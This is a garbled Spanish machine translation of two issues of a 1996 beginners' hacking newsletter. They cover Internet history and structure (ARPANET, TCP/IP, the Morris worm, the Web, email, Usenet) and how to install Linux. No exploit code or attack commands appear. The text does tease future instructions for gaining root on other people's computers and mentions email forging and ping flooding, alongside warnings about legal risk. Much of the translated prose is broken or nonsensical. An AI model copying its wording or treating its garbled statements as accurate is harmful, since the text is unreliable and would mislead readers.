March 4, 2017 | Author: Abraham Gonza | Category: N/A
Hackear for Dummies Contenido del Volumen 2: Internet for Dummies Linux! Introducción a TCP / IP Puerto Surf! ____________________________________________________________ GUÍA PARA (casi) Inofensivo HACKING Vol. 2 Número 1 Internet for Dummies - omitir esto si usted es un asistente de Unix. Pero si usted lee en Obtendrá algunas instrucciones de hacking más kewl. ____________________________________________________________ Los seis Guías de (casi) Inofensivo hacking del Vol. 1 saltaron inmediatamente en cómo hacer trucos de hacking.Pero si usted es como yo, todos esos detalles de sondear los puertos y jugando con hipótesis y hacer ping a los hosts se pone un poco de vértigo. Así que ¿qué hay de la captura de la respiración, de pie atrás y revisar qué diablos es lo que estamos jugando con?Una vez que tengamos los fundamentos bajo control, podemos pasar a la piratería en serio. Además, he estado luchando con mi conciencia sobre la posibilidad de comenzar a darle paso a paso las instrucciones sobre cómo obtener acceso root a los ordenadores de otras personas. El pequeño ángel en mis susurros hombro derecho, "Ganando la raíz sin permiso en las computadoras de otras personas no es agradable.Así que no se lo digas a la gente cómo hacerlo. "El pequeño diablo en mi hombro izquierdo, dice," Carolyn, todos estos hackers piensan que no sabes nada! Proove a ellos ustedes saben cómo romper! "El pequeño ángel dice:" Si alguno Guía de lectura para (casi) Inofensivo hacking ensaya este truco, usted podría tener problemas con la ley por conspiración para dañar computadoras de otras personas "La. pequeño diablo dice: "Pero, Carolyn, decirle a la gente cómo romper en la raíz y que se cree que es KEWL!" Así que aquí es el trato. En este y en los próximos números de la Guía a (casi) Inofensivo hacking te diré varias maneras de iniciar sesión como superusuario en la cuenta de la raíz de algunos equipos host de Internet. Pero las instrucciones que dejarán una o dos cosas a la imaginación. Mi teoría es que si usted está dispuesto a vadear a través de todo esto, es probable que no es uno de esos aspirantes a hackers emociones baratas que utilizarían este conocimiento para hacer algo destructivo que podría terminar en la cárcel. ***************************** Sugerencia técnica: Si usted desea convertirse en un * * seria hacker, que necesitará Linux (una variedad freeware de Unix) en su PC. Una razón es que entonces se puede romper en la raíz legalmente todo lo que quieras - en su propia computadora. Se golpes seguros que luchan en todo en la computadora de otra persona, sólo para descubrir que lo que usted pensaba que era la raíz fue una trampa hábilmente y el administrador del sistema y la risa del FBI en todo el camino a la cárcel. Linux puede ser instalado en un PC con tan sólo una CPU 386, a sólo 2 Mb RAM y tan sólo 20 MB de disco duro. Usted tendrá que volver a formatear el disco duro. Mientras que algunas personas se han instalado con éxito Linux sin
destrozar sus cosas DOS / Windows, no cuente en salirse con la suya. Copia de seguridad, copia de seguridad, copia de seguridad! ***************************** ***************************** Usted puede ir a la cárcel advertencia: Crack en la raíz en el ordenador de otra persona y la cárcel se convierte en una clara posibilidad. Piense en esto: cuando ves una noticia sobre algún hacker ser pillado, ¿con qué frecuencia usted reconoce el nombre? ¿Con qué frecuencia es el último busto está haciendo para alguien famoso, como oscuro Tangente o Se7en o Emmanuel Goldstein? ¿Qué tal, como, ¡nunca! Eso es porque realmente buenos hackers encontrar la manera de no hacer cosas estúpidas. Aprenden a agrietarse en las computadoras para el desafío intelectual y de averiguar cómo hacer que las computadoras a salvo de intrusos. Lo hacen no bull su camino en la raíz y hacer un lío de cosas, que tiende a inspirar a los administradores de sistemas a llamar a la policía. ********************************* Aviso Emocionante: ¿Es demasiado aburrido para simplemente cortar en su propia máquina Linux? Colgar en él.Ira Winkler de la Asociación Nacional de Seguridad Informática, Dean Garlick de la dinámica del espacio Lab de la Universidad Estatal de Utah y yo estamos trabajando en la creación de hack.net, un lugar donde va a ser legal para entrar en los ordenadores. No sólo eso, estamos buscando patrocinadores que darán premios en efectivo y becas a los que muestran las mayores habilidades de hacking. Ahora suena eso como más phun que la cárcel? ***************************** Por lo tanto, vamos a saltar en nuestros fundamentos de hacking tutorial con una mirada a la anarquía maravilloso que es Internet. Tenga en cuenta que estas guías a (casi) Inofensivo hacking enfoque en Internet. Esto se debe a que hay muchas maneras legales para hackear en Internet. Además, hay más de 10 millones de estas computadoras fácilmente hackable en Internet, y el número crece cada día. Conceptos básicos de Internet Nadie es dueño de la Internet. Nadie lo ejecuta. Nunca fue planeado para ser lo que es hoy. Acaba de suceder, la consecuencia de un mutante 1969 Agencia de Proyectos de Investigación Avanzada de Defensa de EE.UU. experimento. Este sistema anárquico permanece atado juntos porque sus usuarios obedecen voluntariamente algunas reglas básicas. Estas reglas se pueden resumir en dos palabras: Unix y TCP / IP (con un guiño a UUCP). Si usted entiende, realmente entender Unix y TCP / IP (y UUCP), que se convertirá en un pez nadando en el mar del ciberespacio, un Uberhacker entre los aspirantes a hackers, un maestro del universo de Internet. Para obtener ayuda técnica, Internet es una red distribuida en todo el mundo de la informática / comunicaciones se mantienen unidos por un estándar de comunicaciones común, / Protocolo de Internet Transmission Control Protocol (TCP / IP) y un poco de UUCP. Estas normas permiten que cualquiera pueda conectar un ordenador a Internet, que se convierte en otro nodo de esta red de Internet. Todo lo que se necesita es obtener una dirección de Internet asignada al nuevo equipo, que se conoce entonces como un Internet "anfitrión" y corbata en un enlace de comunicaciones de Internet. Estos enlaces están disponibles en casi todas partes del mundo.
Si utiliza un servicio en línea de su ordenador personal, usted también puede convertirse temporalmente parte de la Internet. Hay dos formas principales para conectar a un servicio en línea. Existe la conexión a la patata cybercouch que cada novato utiliza. Se requiere ya sea un punto a punto (PPP) o SLIPconnection, lo que le permite ejecutar fotos bonitas con el navegador web. Si tienes algún tipo de software empaquetado de su ISP, le da automáticamente este tipo de conexión. O se puede conectar con un emulador de terminal a un host de Internet. Este programa puede ser algo tan simple como el programa de Windows 3.1 "Terminal" en el icono "Accesorios". Una vez que haya marcado y conectado sólo eres otro terminal en este equipo anfitrión. No le dará cuadros bonitos. Esta conexión será similar a lo que se obtiene en un anticuado BBS. Pero si usted sabe cómo utilizar este tipo de conexión, podría incluso darle acceso root a ese host. Pero, ¿cómo está el equipo host utiliza conectado a Internet? Se va a correr un poco de variedad del sistema operativo Unix. Desde Unix es tan fácil de adaptarse a casi cualquier ordenador, esto significa que casi cualquier ordenador puede llegar a ser un host de Internet. Por ejemplo, a veces entro en Internet a través de una serie que es un ordenador Silicon Graphics Indigo en la Universidad del Estado de Utah. Su dirección de Internet es fantasia.idec.sdl.usu.edu. Este es un equipo optimizado para el trabajo de la animación por ordenador, pero también puede funcionar como un host de Internet. En otras ocasiones, el punto de entrada utilizado puede ser pegasus.unm.edu, que es un IBM RS 6000 Modelo 370. Se trata de un equipo optimizado para la investigación en la Universidad de Nuevo México. Cualquier ordenador que puede ejecutar el software necesario - que es básicamente el sistema operativo Unix - tiene un módem, y está vinculada a un enlace de comunicaciones por Internet, puede convertirse en un nodo de Internet. Incluso un PC puede convertirse en un servidor de Internet mediante la ejecución de uno de los sabores de Linux de Unix. Después de su puesta en marcha con Linux se puede acordar con el proveedor de Internet de su opción de vincular de forma permanente a Internet. De hecho, muchos ISP utilizan nada más que ordenadores conectados en red con Linux! Como resultado, toda la computación, almacenamiento de datos y envío, recepción y envío de mensajes a través de Internet es manejada por los millones de ordenadores de muchos tipos y es propiedad de un sinnúmero de empresas, instituciones educativas, entidades gubernamentales e incluso particulares. Cada uno de estos ordenadores tiene una dirección individual que le permite ser alcanzado a través de la Internet, si conectado a un enlace de comunicaciones apropiado. Esta dirección puede ser representado de dos maneras: como un nombre o un número. Los enlaces de comunicaciones de Internet también son propiedad y mantenidos de la misma manera anárquica como los anfitriones. Cada propietario de un host de Internet es responsable de encontrar y pagar por un enlace de comunicaciones que hará que ese host atada con al menos otro anfitrión. Enlaces de comunicaciones puede ser tan simple como una línea telefónica, un enlace de datos inalámbrica, como paquetes de datos digitales celulares, o tan complicado como un enlace de fibra óptica de alta velocidad. Mientras el enlace de comunicaciones puede utilizar TCP / IP o UUCP, se puede encajar en el Internet.
Así, la red crece sin coordinación general. Un nuevo propietario de un host de Internet sólo tiene que conseguir el permiso para atar en un enlace de comunicaciones a otro anfitrión. Alternativamente, si el proveedor del enlace de comunicaciones decide Este ordenador, por ejemplo, un paraíso para los spammers, se puede cortar este "sitio canalla" fuera de la Internet. El sitio de pícaro debe entonces snooker algún vínculo otras comunicaciones en atar en Internet de nuevo. La forma en la mayoría de estos ordenadores interconectados y comunicaciones vincula el trabajo es a través de la lengua común del protocolo TCP / IP. Básicamente, TCP / IP rompe cualquier comunicación de Internet en discretos "paquetes". Cada paquete incluye información sobre la manera de derrotar a él, de corrección de errores, y las direcciones del remitente y el destinatario. La idea es que si se pierde un paquete, el remitente lo sabrá y vuelva a enviar el paquete. Cada paquete se puso en marcha entonces en el Internet. Esta red puede elegir automáticamente una ruta de nodo a nodo para cada paquete utilizando lo que está disponible en el momento, y vuelve a montar los paquetes en el mensaje completo en el equipo al que iba dirigida. Estos paquetes pueden seguir rutas tortuosas. Por ejemplo, un paquete puede ir desde un nodo en Boston a Amsterdam y de vuelta a los EE.UU. para el destino final en Houston, mientras que otro paquete del mismo mensaje puede ser enrutado a través de Tokio y Atenas, y así sucesivamente. Por lo general, sin embargo, los enlaces de comunicaciones no son tan tortuosa. Enlaces de comunicación pueden incluir la fibra óptica, líneas telefónicas y los satélites. La fuerza de esta red de conmutación de paquetes es que la mayoría de los mensajes obtendrán automáticamente a través de la congestión del tráfico a pesar mensaje pesado y muchos enlaces de comunicaciones están fuera de servicio. La desventaja es que los mensajes pueden simplemente desaparecer dentro del sistema. También puede ser difícil llegar a los ordenadores deseados si los enlaces demasiadas comunicaciones no están disponibles en el momento. Sin embargo, todas estas maravillosas características también son profundamente hackeable. El Internet es lo suficientemente robusto para sobrevivir - por lo que sus inventores afirman - incluso la guerra nuclear. Sin embargo, también es tan débil que sólo con un poco de instrucción, es posible aprender a suplantar seriamente el sistema (correo electrónico forjado) o incluso poner temporalmente fuera de servicio los equipos host de Internet de otras personas (ping de inundaciones, por ejemplo.) Por otra parte, las cabeceras de los paquetes que llevan los comandos de hacking regalará la información de la cuenta de la que un hacker está funcionando. Por esta razón, es difícil de ocultar perfectamente cuando en el Internet. Es esta tensión entre este poder y la robustez y la debilidad y el potencial de confusión que hace que Internet sea un parque infantil de piratería informática. Por ejemplo, AQUÍ ESTÁ SU CONSEJO PIRATAS que has estado esperando para este problema: ftp://ftp.secnet.com Este sitio ftp fue publicada en la lista BUGTRAQ, que se dedica a la discusión de los agujeros de seguridad de Unix. Moderador es Aleph One, que es un auténtico Uberhacker. Si desea suscribirse a la BUGTRAQ, correo electrónico
[email protected] con el mensaje "subscribe BUGTRAQ." Ahora, de vuelta a lo básico de Internet. Historia del Internet
Como se mencionó anteriormente, el Internet nació como un esfuerzo de Estados Unidos Agencia de Proyectos de Investigación Avanzada (ARPA) en 1969. Sus inventores llamaron ARPANET. Pero a causa de su valor en la investigación científica, la Fundación Nacional de Ciencia de Estados Unidos (NSF) se hizo cargo en 1983. Pero en los años transcurridos desde entonces evolucionó gradualmente lejos de cualquier fuente única de control. En abril de 1995 la NSF cortó los últimos faldas. Ahora Internet está dirigido por nadie. Simplemente sucede y surge de los esfuerzos de aquellos que juegan con ella y la lucha con el software y el hardware. Nada de nada como esto nunca ha sucedido antes. Ahora tenemos un sistema informático con una vida propia.Nosotros, como los piratas informáticos, formamos una gran parte del motor de mutación que mantiene el Internet en evolución y cada vez más fuerte. También formamos una gran parte del sistema inmunológico de esta exótica criatura. La idea original de ARPANET fue diseñar una red informática y de las comunicaciones que se convertiría en lo redundante, tan robusto, y así poder operar sin control centralizado, que incluso podría sobrevivir una guerra nuclear. Lo que también pasó es que ARPANET evolucionó hasta convertirse en un ser que ha sobrevivido a la final de la financiación del gobierno, sin siquiera un bache en su crecimiento. Así pues, su descendencia anárquica, la Internet, ha tenido éxito más allá de los sueños más salvajes de sus arquitectos originales. El Internet ha crecido de manera explosiva, sin un final a la vista. En sus inicios como ARPANET se celebró sólo 4 anfitriones. Un cuarto de siglo más tarde, en 1984, contenía sólo 1000 anfitriones. Pero en los próximos 5 años, este número creció diez veces a 10.000 (1989). Durante los 4 años siguientes creció otra diez veces a 1.000.000 (1993). Dos años más tarde, a finales de 1995, se estima que la Internet para tener por lo menos 6 millones de equipos host. Probablemente hay más de 10 millones en la actualidad. No parece haber ningún final a la vista aún por el increíble crecimiento de este niño mutante de ARPANET. De hecho, una preocupación planteada por el crecimiento exponencial de Internet es que la demanda eventualmente puede ahora ganarle la carrera capacidad. Porque ahora hay una entidad posee o controla Internet, si la capacidad de los enlaces de comunicaciones entre nodos es demasiado pequeño, y se convirtiera en serio empantanado, podría ser difícil de solucionar el problema. Por ejemplo, en 1988, Robert Morris, Jr. desató un programa tipo "virus" en la Internet comúnmente conocido como el "gusano de Morris." Este virus haría copias de sí mismo en cualquier equipo que era y luego enviar copias de las comunicaciones enlaces a otros servidores de Internet. (Se utiliza un bug en sendmail que permitía el acceso a la raíz, lo que permite que el virus de actuar como superusuario). Rápidamente la propagación exponencial de este virus hizo el colapso de Internet desde el espacio de tráfico de comunicaciones y el disco es atado. A la hora de Internet todavía estaba bajo cierta apariencia de control por parte de la Fundación Nacional de Ciencia y estaba conectado a unos pocos miles de ordenadores. La Red fue cerrado y todos los virus de la purificación de sus equipos host, y luego el neto fue puesto de nuevo en funcionamiento. Morris, por su parte, fue puesto en la cárcel. Existe cierta preocupación de que, a pesar de la mejora de las medidas de seguridad (por ejemplo, "firewalls"), alguien puede encontrar una nueva manera
de lanzar un virus que podría nuevamente apagar el Internet. Dada la pérdida de control centralizado, reiniciando podría ser mucho más tiempo si esto llegara a suceder de nuevo. Pero el restablecimiento de un control centralizado hoy como la que existía en el momento de la "Gusano Morris" es probable que sea imposible. Incluso si fuera posible, los arquitectos de ARPANET originales eran probablemente correctos en su evaluación de que la Red podría ser más susceptibles de falla masiva en lugar de menos si algún control centralizado se encontraban en el lugar. Quizás la característica más significativa única de la Internet de hoy es esta falta de control centralizado. Ninguna persona u organización ahora es capaz de controlar la Internet. De hecho, la dificultad del control se convirtió en un problema tan pronto como su primer año de funcionamiento como ARPANET. En ese año de correo electrónico fue inventado espontáneamente por sus usuarios. Para sorpresa de los directivos de ARPANET, por el segundo año de correo electrónico representaron el grueso de la comunicación a través del sistema. Debido a que Internet había crecido hasta tener una vida totalmente autónoma, descentralizada propia, en abril de 1995, la NSF dejó NSFNET financiación, la columna vertebral de las comunicaciones de fibra óptica que en un tiempo había dado NSF la tecnología para controlar el sistema. La proliferación de enlaces de comunicaciones paralelas y anfitriones tenido para entonces omite por completo cualquier posibilidad de control centralizado. Hay varias características importantes de Internet: * World Wide Web - una red editorial hipertexto y ahora la parte de más rápido crecimiento de la Internet. * Correo electrónico - una forma de enviar mensajes electrónicos * Usenet - foros en los que los usuarios pueden publicar y ver los mensajes públicos * Telnet - una forma de la cuenta para los ordenadores remotos de Internet * Protocolo de transferencia de archivos - una forma de descargar archivos desde equipos remotos de Internet * Internet Relay Chat - conversaciones de texto en tiempo real - utilizado principalmente por los hackers y otros de Internet veteranos * Gopher - una forma de catalogación y búsqueda de información. Esto está creciendo rápidamente obsoletos. A medida que los surfistas portuarias saben, hay docenas de otros servicios interesantes pero menos conocidas como whois, dedo, mesa de ping etc. La red mundial La World Wide Web es la principal característica más reciente de Internet, que data de la primavera de 1992. Se compone de "páginas web", que son como las páginas de un libro, y enlaces desde especialmente marcados palabras, frases o símbolos en cada página a otras páginas Web. Estas páginas y enlaces juntos crean lo que se conoce como "hipertexto". Esta técnica permite atar juntos muchos documentos diferentes que se podrán escribir por muchas personas y se almacenan en muchos equipos diferentes de todo el mundo en un documento hipertexto. Esta técnica se basa en el estándar Universal Resource Locator (URL), que especifica cómo conectar con el ordenador y acceder a los archivos en su interior, donde se pueden almacenar los datos de una página Web.
Un URL es siempre de la forma http: // , donde incluye un nombre de dominio que debe ser registrado en una organización llamada InterNIC para hacer que las dos páginas web diferentes (o direcciones de correo electrónico seguro , o direcciones de computadora) no terminan siendo idéntica. Este registro es una de las pocas características de control centralizados de Internet. He aquí cómo funciona el hipertexto de la World Wide Web. El lector podría llegar a una declaración como "nuestra empresa ofrece el servicio de camiones LTL a todas las principales ciudades de Estados Unidos." Si se pone de relieve esta declaración en la página "web", que significa que un clic de ratón de la computadora del lector que él o ella se llevará a una nueva página web con los detalles. Estos pueden incluir horarios completos y un formulario para llenar para solicitar una recogida y entrega. Algunas páginas Web incluso ofrecen maneras de hacer pagos electrónicos, por lo general a través de tarjetas de crédito. Sin embargo, la seguridad de las transferencias de dinero a través de Internet sigue siendo un problema importante. Sin embargo, pese a las preocupaciones con la verificabilidad de las transacciones financieras, el comercio electrónico a través de Internet está creciendo rápidamente. En su segundo año de existencia, 1994, sólo algunos $ 17,6 millones en las ventas se realizaron a través de Internet. Pero en 1995, las ventas alcanzaron los $ 400 millones. Hoy, en 1996, la web se ha atascado con sitios comerciales que piden información de su tarjeta de crédito. Además, la Web está siendo utilizado como una herramienta en la distribución de una nueva forma de moneda, conocido como dinero electrónico. Es concebible que, si el obstáculo de la verificabilidad se puede superar, que el dinero electrónico (a menudo llamado ecash) puede jugar un papel importante en la economía mundial, lo que simplifica el comercio internacional. También puede llegar a hacer que las monedas nacionales e incluso los impuestos tal como lo conocemos obsoleto. Ejemplos de sitios web donde se puede obtener ecash incluyen Mark Twain Banco de St. Louis, MO (http://www.marktwain.com) y Digicash de Amsterdam, Países Bajos (http://www.digicash.com). La naturaleza casi fuera de control de Internet se manifiesta en la World Wide Web. El autor de una página web no tiene que pedir permiso o hacer cualquier arreglo con los autores de otras páginas web a las que él o ella desea establecer vínculos. Los enlaces pueden ser establecidos de forma automática simplemente con la programación en las URL de los enlaces de la página Web que desee. Por el contrario, la única forma en que el autor de una página web puede evitar que otras personas de su lectura o el establecimiento de enlaces de hipertexto a ello es la creación de un sistema de protección de contraseña (o por no contar con enlaces de comunicaciones con el resto de la Internet). Un problema con la World Wide Web es cómo encontrar cosas en él. Del mismo modo que cualquier persona puede conectar un ordenador nuevo al Internet, por lo que también existe una autoridad central con control o incluso el conocimiento de lo que se publica en la World Wide Web. Nadie tiene que pedir permiso de una autoridad central para poner una página Web. Una vez que el usuario conoce la dirección (URL) de una página web, o por lo menos la URL de una página Web que une finalmente a la página deseada,
entonces es posible (siempre que los enlaces de comunicaciones están disponibles) para casi instantáneamente conectar con esta página. Debido al valor de conocer las direcciones URL, ahora hay muchas empresas e instituciones académicas que ofrecen índices de búsqueda (ubicados en la Web) en la World Wide Web. Programas automatizados como rastreadores Web buscar en la Web y catalogar las direcciones URL que se encuentran en su viaje desde el enlace de hipertexto a enlace de hipertexto. Pero debido a que la web está en constante crecimiento y cambio, no hay manera de crear un catálogo exhaustivo de toda la Web. Email El correo electrónico es el uso segunda más antigua de la Internet, que se remonta a la ARPAnet de 1972. (El primer uso fue permitir que las personas se conecten de forma remota en que su elección de uno de los cuatro equipos en los que ARPANET fue lanzado en 1971.) Hay dos usos principales de correo electrónico: comunicaciones privadas, y el correo electrónico transmitido.Cuando transmitido, correo electrónico sirve para hacer anuncios (radiodifusión unidireccional), y para continuar las discusiones entre grupos de personas, como nuestra lista Happy Hacker. En el modo de grupo de discusión, cada mensaje enviado por todos los miembros de la lista se transmite a todos los otros miembros. Los dos tipos de programas más utilizados para transmitir a los grupos de discusión de correo electrónico son mayordomo y servidor de listas. Usenet Usenet era una consecuencia natural de la lista de discusión de grupo de correo electrónico transmitido. Uno de los problemas con las listas de correo electrónico es que no había manera fácil para la gente nueva a estos grupos a unirse a ellos. Otro problema es que a medida que el grupo crece, un miembro puede ser inundado con decenas o cientos de mensajes de correo electrónico cada día. En 1979 estos problemas fueron abordados por el lanzamiento de Usenet. Usenet se compone de grupos de usuarios que llevan en las discusiones en forma de "mensajes". A diferencia de un grupo de discusión por correo electrónico, estos mensajes se almacenan, por lo general durante dos semanas más o menos, a la espera de los lectores potenciales. Como los nuevos mensajes se envían a un grupo de noticias, que se transmiten a todos los hosts de Internet que se ha suscrito a llevar a los grupos de usuarios a los que pertenecen estos puestos. Con muchos programas de conexión a Internet se puede ver las similitudes entre Usenet y correo electrónico.Ambos tienen encabezados similares, que hacen un seguimiento de su movimiento a través de la Red. Algunos programas como el pino se envían para enviar el mismo mensaje simultáneamente a ambas direcciones de correo electrónico y grupos de noticias. Todos los lectores de noticias de Usenet le permiten enviar por correo electrónico a los autores de los mensajes, y muchos también le permiten enviar por correo electrónico estos mensajes sí a usted oa otras personas. Ahora, aquí es una visión general de los conceptos básicos de Internet que planeamos cubrir en los próximos números de guía para (casi) Inofensivo de Hacking: 1. Unix Discutimos "cáscaras", que le permiten a uno escribir programas ("scripts") que automatizan serie complicada de comandos de Unix. El lector se introduce el
concepto de secuencias de comandos que realizan funciones de hacking. Introducimos Perl, que es un lenguaje de programación de shell utilizado para la mayoría de la élite de los scripts de hacking como SATAN. 3. TCP / IP y UUCP Este capítulo trata de los enlaces de comunicaciones que unen a Internet desde la perspectiva de los piratas informáticos. Se da especial atención a UUCP ya que es tan hackeable. 4. Direcciones de Internet, nombres de dominio y Routers El lector se entera de cómo se envía la información a los lugares correctos en Internet, y cómo los hackers puede hacer que se vaya a los lugares equivocados! Cómo buscar hosts UUCP (que no están bajo el sistema de nombres de dominio) está incluido. 5. Fundamentos de Elite de Hacking: Puertos, paquetes y los permisos de archivos Esta sección permite que el genio de la piratería en serio fuera de la botella. Ofrece una serie de ejercicios en los que el lector puede disfrutar de acceso a casi cualquier host de Internet elegido al azar. De hecho, al final del capítulo el lector habrá tenido la oportunidad de practicar varias docenas de técnicas para ganar la entrada a las computadoras de otras personas. Sin embargo, estos hacks que enseñamos son 100% legal! _________________________________________________________ ¿Quiere suscribirse a esta lista? Email
[email protected] con el mensaje "subscribe happyhacker." ¿Quieres compartir algunos stuph kewl con la lista Happy Hacker? Envíe sus mensajes a
[email protected]. Para enviarme correo electrónico confidencial (por favor, no hay discusión de actividades ilegales) utilizan
[email protected]. Por favor, llamas directas a dev/
[email protected]. Piratería feliz! Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUÍA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final .. ________________________________________________________ ________________________________________ GUÍA PARA (casi) Inofensivo HACKING Vol. 2 Número 2 Linux! ________________________________________ Unix ha convertido en el sistema operativo primo de la Internet. De hecho, Unix es el sistema operativo más utilizado en el mundo entre los equipos con más poder que los PC. Es cierto que Windows NT está subiendo más rápido que un sistema operativo común de Internet, y es taaan maravillosamente buggy que parece que podría convertirse en el número uno favorito para romper en. Pero hoy Unix en todas sus maravillosos sabores todavía es el sistema operativo para saber para ser un hacker de verdad élite. Hasta ahora hemos supuesto que usted ha estado hacking utilizando una cuenta shell que se obtiene a través de su proveedor de servicios Internet (ISP). Una cuenta shell le permite dar comandos de Unix en una de las computadoras de su ISP. Pero usted no tiene que depender de su proveedor de Internet para una máquina que te permite jugar con Unix. Puede ejecutar Unix en su propio
ordenador y con una conexión SLIP o PPP ser conectado directamente a Internet. *********************** Newbie nota: Serial Line Internet Protocol (SLIP) y Point-to-Point Protocol (PPP) conexiones que dan una dirección de Protocolo de Internet temporal (IP) que le permite ser enganchado directamente a Internet. Tienes que utilizar SLIP o conexiones PPP para llegar a utilizar un navegador Web que le da imágenes en lugar de texto solamente. Así que si usted puede ver las imágenes en la Web, ya tiene uno de estos disponibles para usted. La ventaja de utilizar una de estas conexiones directas para sus actividades de hacking es que no vas a dejar atrás un archivo de registro de la cáscara de administrador de sistemas de su ISP para estudiar minuciosamente. Incluso si usted no está violando la ley, un archivo de registro de shell que le muestra haciendo un montón de stuph pirata informático puede ser suficiente para algunos administradores de sistemas para cerrar sumariamente su cuenta. ******************** ¿Cuál es el mejor tipo de equipo para ejecutar Unix en? A menos que seas un hacker rico que piensa que nada de comprar una estación de trabajo Sun SPARC, es probable que mejor sabe hacer con algún tipo de PC. Hay casi un sinnúmero de variantes de Unix que se ejecutan en los ordenadores personales, y algunos para Macs. La mayor parte de ellos son gratuitos para descargar, o económicamente disponible en CD-ROM. Las tres variantes más comunes de Unix que se ejecutan en los ordenadores son de Sun Solaris, FreeBSD y Linux.Solaris cuesta alrededor de $ 700. Basta de charla. FreeBSD es muy, muy bueno. Pero cont encontrar muchos manuales o grupos de noticias que cubren FreeBSD. Linux, sin embargo, tiene la ventaja de estar disponible en muchas variantes (para que pueda divertirse mezclar y combinar los programas de las diferentes ofertas de Linux). Lo más importante, Linux es apoyado por muchos manuales, grupos de noticias, listas de correo y sitios Web. Si usted tiene amigos de hackers en su área, la mayoría de ellos probablemente usar Linux y pueden ayudarte. ********************* Nota histórica: Linux fue creado en 1991 por un grupo liderado por Linus Torvalds, de la Universidad de Helsinki. Linux tiene derechos de autor bajo la Licencia Pública General de GNU. En virtud de este acuerdo, Linux puede ser redistribuido a cualquiera que junto con el código fuente. Cualquier persona puede vender cualquier variante de Linux y modificarlo y volver a empaquetar. Pero incluso si alguien modifica el código fuente que él o ella no puede reclamar derechos de autor para cualquier cosa creada a partir de Linux. Cualquier persona que vende una versión modificada de Linux debe proporcionar el código fuente a los compradores y les permitirá reutilizar en sus productos comerciales sin cobrar derechos de licencia. Esta disposición se conoce como un "copyleft". En virtud de esta disposición, los creadores originales de Linux no reciben licencias o shareware honorarios.Linus Torvalds y los muchos otros que han contribuido a Linux han hecho desde la alegría de programación y un sentido de comunidad con todos los que se espera utilizar Linux en el espíritu de buena piratería tipo. Viva Linux!Viva Torvalds! **********************
Linux consiste en el propio sistema operativo (llamado el "kernel"), además de un conjunto de programas asociados. El kernel, como todos los tipos de Unix, es un sistema operativo multitarea y multiusuario. A pesar de que utiliza una estructura de archivos diferente, y por lo tanto no es directamente compatible con DOS y Windows, es tan flexible que muchos programas DOS y Windows se pueden ejecutar mientras que en Linux. Así que un usuario avanzado probablemente querrá arrancar en Linux y luego ser capaz de ejecutar programas DOS y Windows desde Linux. Programas asociados que vienen con la mayoría de las distribuciones de Linux pueden incluir: * Un programa de shell (Bourne Again Shell - BASH - es más común); * Compiladores para lenguajes de programación como Fortran-77 (mi favorito!), C, C ++, Pascal, LISP, Modula-2, Ada, Básico (el mejor lenguaje para un principiante), y Smalltalk .; *, Una interfaz gráfica de usuario X (a veces llamado X-Windows) * Programas de utilidades como el pino lector de correo electrónico (mi favorito) y Elm Las diez principales razones para instalar Linux en su PC: 1. Cuando Linux es ilegal, sólo los proscritos será el propietario de Linux. 2. Cuando la instalación de Linux, es muy divertido para ejecutar fdisk sin copias de seguridad de primera. 3. Las llamas que obtiene de hacer preguntas sobre los grupos de noticias de Linux son de una calidad superior a las llamas que recibe para su publicación en alt.sex.bestiality. 4.No importa qué sabor de Linux se instala, se dará cuenta mañana había una ersión mucho más 3l1te usted debe haber tenido lugar. 5.People que usan BSD gratis o Solaris no se burlan de ti. Ofrecerán su simpatía en su lugar. 6.At la próxima Def Con podrás decir stuph como "así entonces su-ed a su cuenta y grepped todos sus archivos de 'kissyface'." Vaya, grepping archivos de otras personas es un no-no, olvidar que alguna vez sugerí. Resaca 7.Port en la intimidad. 8.One palabra: exploits. 9.Installing Linux en su PC de la oficina es como ser un empleado de correos y llevar una Uzi funcione. 10.But - - si instala Linux en su computadora de la oficina, que será el jefe no tiene ni idea de lo que eso significa. ¿Qué tipos de Linux funcionan mejor? Depende de lo que realmente quieres. Redhat Linux es famoso por ser el más fácil de instalar. El conjunto 3.0 CD-ROM Walnut Creek Linux también es muy fácil de instalar - para Linux, que es! Mi enfoque ha sido el de conseguir un montón de versiones de Linux y mezclar y combinar lo mejor de cada distribución. Me gusta la versión de Walnut Creek mejor porque con mi marca X hardware, su característica de detección automática era un salvavidas. Instalación de Linux no es para los débiles de corazón! Varios consejos para sobrevivir a la instalación son: 1) A pesar de que en teoría puede ejecutar Linux en un 286 con 4 MB de RAM y dos unidades de disquete, es * mucho * más fáciles con un 486 o superior con 8 MB de RAM, un CD-ROM, y por lo menos 200 MB de disco duro libre espacio.
2) Conocer tanto como sea posible acerca de qué tipo de placa madre, módem, disco duro, CD-ROM y tarjeta de vídeo que tenga. Si usted tiene alguna documentación para ellos, ellos tienen a la mano para hacer referencia durante la instalación. 3) Se trabaja mejor utilizar hardware que es el nombre de la marca y un poco fuera de fecha en su computadora.Debido a que Linux es un programa gratuito, que no ofrece controladores de dispositivo para todo el hardware más reciente. Y si su hardware es como el mío - un montón de la marca X y El Cheapo stuph, puede tomar mucho tiempo experimentando con lo que los conductores trabajarán. 4) Antes de comenzar la instalación, haga una copia de seguridad del disco duro (s)! En teoría se puede instalar Linux sin dañar sus archivos DOS / Windows. Pero todos somos humanos, especialmente si siguiendo los consejos del punto 7). 5) Obtener más de una distribución de Linux. La primera vez que he instalado con éxito Linux, finalmente ha golpeado en algo que trabajó con el disco de arranque de una distribución con el CD-ROM para otro. En cualquier caso, cada distribución de Linux tiene diferentes programas de utilidades, emuladores de sistemas operativos, compiladores y más. Añadir a todos a su sistema y se le configura para convertirse más allá de élite. 6) Comprar un libro o dos o tres en Linux. No me gusta ninguno de ellos! Pero son mejor que nada. La mayoría de los libros sobre Linux vienen con uno o dos CD-ROM que se pueden utilizar para instalar Linux. Pero me di cuenta que lo que estaba en los libros no coincide exactamente con lo que había en los CDROM. 7) Te recomiendo beber durante la instalación. No puede hacer la depuración ir más rápido, pero al menos no le importa lo difícil que es. Ahora casi puedo garantizar que, incluso después de todos estos 6 consejos, usted todavía tiene problemas con la instalación de Linux. Oh, ¿tengo 7 avisos ahí arriba? Olvídese número 7. Pero confiad. Dado que todos los demás también sufre poderosamente durante la instalación y el uso de Linux, el Internet tiene una increíble cantidad de recursos para el Linux -challenged. Si usted es alérgico a conseguir flameado, puede empezar con los sitios Web de soporte de Linux. El mejor que he encontrado es http://sunsite.unc.edu:/pub/Linux/. Incluye la lista Linux Preguntas frecuentes (FAQ), disponible en sunsite.unc.edu:/pub/Linux/docs/FAQ. En el directorio / 